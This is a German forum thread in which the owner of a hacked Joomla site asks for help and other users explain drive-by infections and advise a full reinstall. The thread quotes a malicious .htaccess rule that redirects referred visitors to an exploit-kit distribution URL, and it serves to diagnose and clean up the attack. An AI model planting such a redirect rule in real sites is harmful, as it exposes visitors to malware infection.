Websitebefall - Malware gefunden

Hallo liebes Forum,

vor kurzem wurde unsere Website gehackt. Als direkte Folge wurden wir von Google auf eine Blacklist gesetzt und ich habe die Seite neu in der aktuellsten Joomla Version (2.5.9) aufgesetzen müssen (www.nalepastrass.de). Nun füge ich nach und nach die alten Inhalte ein.

Die Veränderung durch den Hack bestand darin, dass im Frontend beim anklicken eines Links stets auf eine andere Website verlinkt wurde (http : // aennekens . de). Im Backend konnte ich keine Buttons mehr anklicken oder Listen filtern. Ich glaube Javascrpípt wurde irgendwie geblockt.

Leider war ich dabei so dumm und voreilig und habe einen kompletten Ordner der alten Website zur neuen, sauberen Website hochgeladen. Ich wollte eine 360 Grad-Ansicht wieder zugänglich machen. Als ich dann aber die Panoramaansicht anklickte erschien wieder die aennekens-Seite. In dem Ordner war nämlich in einer htaccess-Datei wohl der krankmachende Link enthalten:

Code:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/
$ [NC]
RewriteRule ^.*$ http://aennekens.de/hozs.html?h=1341777 [L,R]
</IfModule>

Ich habe sofort das betroffene Verzeichnis komplett gelöscht und auch die Verlinkung. Einen Intensivscan meines PCs mit Microsoft Security Essentials gemacht - ohne Meldung. Zudem habe ich nun das erste mal das Anti-Malware Programm Search & Destroy installiert und gestartet und alle bereinigt - Ergebnis siehe Anhang.

Die Frage ist nun, muss ich jetzt mein System wirklich komplett neu aufsetzen wie in der FAQ beschrieben und die Website neu aufspielen? Da die gleichen Effekte wie zuvor ausgeblieben sind, ist das doch nicht wirklich nötig oder? Vielleicht könnt ihr mir sagen wie dieser verdammte Mist funktioniert hat. Okay da hat jemand ne htaccess eingeschleust, dann wird eine fremde Website aufgerufen, ja aber was ist dann?

Vielen Dank für eure Antworten. Ich bin neu im Forum und würde mich freuen, wenn ihr mir Anregungen gebt, wie ich Zukunft besser einen Beitrag verfasse.

 

Ähm... deine WEBSEITE wurde gehackt. Das heißt, eine Schwachstelle des WEBSERVERS bzw. von Joomla! wurde missbraucht, um Code einzuschleusen.

Mit deinem System auf deinem heimischen PC hat das erstmal überhaupt nichts zu tun, es sei denn, deine dort gespeicherten FTP- oder Backend-Zugangsdaten wurden geklaut und erst dadurch gelang dieser "Hack".

Spybot S&D ist nicht geeignet, eine Infektion des Systems festzustellen. MBAM und OTL wären besser. BTW: Wenn ich das richtig sah, ist bei dir der Acrobat Reader 4 (VIER!!) installiert. Aktuell ist 11.0.02.

 

Danke für deine Antwort, Iron. Entschuldige, dass ich mich erst jetzt melde, gestern konnte ich mich hier nicht einloggen.

Ja, keine Ahnung wie die Infizierung von Joomla oder des Servers von statten ging. War ja auch meine Frage, wollte ja wissen wie ich nun am besten vorgehe.

Dachte der Codeschnipsel kann als Anhaltspunkt dafür genutzt werden. Vielleicht soll ich an anderer Stelle nach Hinweisen suchen, um was für eine Art von Malware es sich handelt oder so. Jetzt weiss ich nur, dass es eigentlich alles sein kann.

Ich benutze den PDF-Viewer. Ist das schlimm, wenn ich den nicht update?

 

Vielleicht war die Joomla-Version veraltet. Möglicherweise hatte auch ein Plug-In eine Sicherheitslücke. Falls du bei deiner Joomla-Installation eine ähnliche Update-Politik wie beim Acrobat Reader angewandt hast, dann würde mich das nicht wundern.

Der Adobe Reader muss aktuell gehalten werden, wie jede Software, die Sicherheitslücken haben kann (also fast alle).

 

Wenn nicht deine Zugangsdaten ausspioniert wurden, war es vermutlich eine sog. SQL-Injection.
Das gelingt bei vielen unzureichend geschützten Seiten und Blogs.

Nochmal: Das war, wenn es letzteres war, eben keine übliche Malware auf deinem PC.

Ja natürlich ist es schlimm. Ein veraltetes, unsicheres Browser-Plugin voller angreifbarer Sicherheitslücken ermöglicht eine Drive-by-Infektion deines PCs beim bloßen Aufruf einer manipulierten Webseite. Und so eine Seite leitet zu anderen Seiten weiter, die unter Kontrolle der Malware-Verteiler stehen und Malware ausliefern, also genau das, was mit deiner Seite letztens gemacht wurde. Du hättest dir also durchaus durch den Besuch deiner eigenen Webseite Malware auf den PC holen können. Vielleicht ist das sogar geschehen.

ACHTUNG: Ich hab mal die Seite untersuchen lassen, die in deiner manipulierten htaccess auftauchte. Schlimmes Ergebnis: Die verteilt das Red Kit Exploit Kit!

Hier das Scan-Ergebnis von urlQuery.net

Ich an deiner Stelle würde dem eigenen PC angesichts deiner angreifbaren Plugins als infiziert betrachten und komplett neu aufsetzen.

Edit: Ich hab hosteurope, den Hoster von aennekens.de, mal angeschrieben und um Deaktivierung der verseuchten Domain gebeten.

 

Okay. Sieht also alles nicht so gut aus. Also muss ich wohl das System neu aufsetzen und alle Passwörter ändern. Vielen Dank für eure Hilfe.

btw kann ich mir gar nicht vorstellen wieso in der Logfile Version 4 des Acrobat Readers auftaucht?! Ist alles aktuell, habe ich gesehen. Lediglich ein Quicktime-Plugin ist beim Firefox angreifbar, steht da. Und das würde auch passen, denn eine Panoramaansicht, in der ich die manpulierte Stelle gefunden habe, sollte mit Quicktime geöffnet werden.

Auf jeden Fall mach ich alles neu. Habe die Auswirkungen eines Angriffs echt unterschätzt.

Wünsche euch nen schönes Wochenende...